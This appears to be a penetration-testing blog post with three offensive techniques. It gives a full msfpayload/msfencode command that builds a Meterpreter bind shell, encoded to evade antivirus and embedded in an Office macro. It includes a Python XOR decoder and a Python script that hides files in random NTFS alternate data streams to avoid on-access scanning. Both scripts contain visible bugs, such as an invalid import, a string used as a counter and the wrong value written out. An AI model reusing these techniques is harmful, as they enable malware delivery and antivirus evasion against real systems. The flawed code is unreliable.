Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (-x option) to work with the payload. This can be done in few simple steps:

1) Generate payload
2) Pipe it to msfencode with -x option ( use i.e. psexec.exe as template )
3) Use to create vbs script with binary representation of the code
4) Paste the output to the macro in Word, Excel or anything else from Office suite
5) Run “ShellcodeExecute” macro from inside of Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste ‘BIND_4999.vbs’ content into MSWord document as macro. Now upload it to crate a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted by i.e. firewall or its a DMZ.

Binary XOR decoder

Handy if you have a few binaries to reverse, and need a quick and dirty way to perform an XOR on them with the given key.

print "[+] XOR binary decoder by Y"
print "[+] Will perform an XOR decode on files given spcified key"
print "[+] contact : If you know me then give me a shout"
print "[+] usage: ./xor_decode.py <FILE_PATH> <key>"
print "[+] example: ./xor_decode.py binary.bin 0xAA,0x00,0xAB"
print "\n"

import sys


def decode(xored_file,key):
    
    fHandle = open(xored_file,"rb")
    fBuffer = fHandle.read()
    fHandle.close()
    
    # key format 0xAA,0x11,0xAB .... 
    key = [key]
    dec_buffer= ''
    c = ''
    # do all the xoring on the buffer
    for x in range(11,len(fBuffer)):
        var_a = ord(fBuffer[x])
        var_b = key[c%len(key)]
        decoded = var_a ^ var_b # xor
        dec_buffer = dec_buffer + (chr(decoded))
        c+=1
        
    out_name = xored_file+".decoded"
    outHandle = open(out_name,"wb")
    outHandle.write(decoded)
    outHandle.close()

xored_file = sys.argv[1]
key = sys.argv[2]
decode(xored_file,key)

Alternate Data Streams File Hider In Python

Alternate Data Streams (ADS) is a nice little feature in NTFS system that practically allows to hide the files in one of the ‘streams’ mandatory supported by NTFS system. In practice, there are not many anty-viruses that check such streams thus it may be sometimes handy to lunch a new process from the ADS that wont be picked up by ‘on-access’ scan engine. The code below will use windows API ( kernel32.dll again ) to find static drives and write a file to ADS.

Steps to follow:
1) Enumerate all the partitions
2) Check for static drive
3) Get the list of first 1000 files
4) Select 1 of the files from the list
5) Use it to write to ADS

NOTE: ADS does not survive compression or many other file operations so once put in place it can be only copied to other locations

print "[+] Advance Data Stream Hider by Y"
print "[+] Will hide selected file in random ADS on the writable drive"
print "[+] contact : If you know me then give me a shout"
print "[+] usage: ./ads_hide.py <FILE_PATH>"
print "\n"

# define imports
import ctypes
import os 
import random
import stat
import string
import sys.argv

#define kernel32 dll
kernel32 = ctypes.windll.kernel32


def getDrives():
    print "[+] Enumerating the list of current partitions"
    drivebits=kernel32.GetLogicalDrives()
    partition_list = list()
    for drives in range(1,26):
        mask=1 << drives
        if drivebits & mask:
                drive_letter='%c:\\' % chr(ord('A')+drives)
                partition_list.append(drive_letter)
                print "\t[+]Found drive: %s" % drive_letter
    return partition_list

def getDriveInfo(drives):
    clean_list = list()
    for dx in drives:
        t = kernel32.GetDriveTypeA(dx)
        if t == 3:
            print "\t[+] Found Fixed Drive : " , dx
            # if we have DRIVE_FIXED
            clean_list.append(dx)
        elif t == 4: # its DRIVE_REMOTE # <- this is good for viruses
            pass
        else:
            # dont append any other type of drive
            pass
    return clean_list

def genRandomPath(drive):
    # enumerate and return random path from the drive ( limit to 1000 possible variants for speed )
    counter = 0
    list_dirs = list()
    for dirname, dirnames, filenames in os.walk(drive):
        for nm in filenames:
            list_dirs.append(os.path.join(dirname, nm))
            counter +=1
            if counter == 1000:
                return list_dirs
            else:
                continue

def getRandomDrive(list_writable_drives):
    print "[+] Selecting Partition"
    size = len(list_writable_drives)
    int = random.randrange(0,size)
    return list_writable_drives[int]

def selectRandomPath(limit,list):
    print "[+] Choosing $PATH"
    int = random.randrange(0,limit)
    return list[int]

def isFileWritable(filepath):
    print "[+] Checking File Write Permission"
    st = os.stat(filepath)
    return bool(st.st_mode & stat.S_IWGRP )

def write(file,path):
    filename,extension = str(file).split(".")
    name = ''.join(random.choice(string.ascii_uppercase + string.digits + string.lowercase) for x in range(random.randrange(4,20)))
    const = str(name)+"."+str(extension)
    
    command = "type %s > %s:%s" % (file,path,const)
    os.popen(command)
    l = str(path)+":"+str(const)
    print "[+] File Hidden In: %s" % l

def ADS_HIDE(FILE_PATH):
    drives =  getDrives()
    print "[+] Checking Drive Type"
    list_to_write = getDriveInfo(drives)
    drive_to_search =  getRandomDrive(list_to_write)
    print "[+] Constructing ADS"
    # first attempt to get files
    path = selectRandomPath(1000,genRandomPath(drive_to_search))
    # check permissions on the file
    if (isFileWritable(path) == True):
        print "[+] Writing to ADS"
        write(FILE_PATH,path)
    else:
        # select another path from the list 
        path = selectRandomPath(1000,genRandomPath(drive_to_search))
        print "[+] Writing to ADS"
        write(FILE_PATH,path)
    


FILE = str(sys.argv[1])
ADS_HIDE(FILE)

Again, this code is here only for the educational purposes.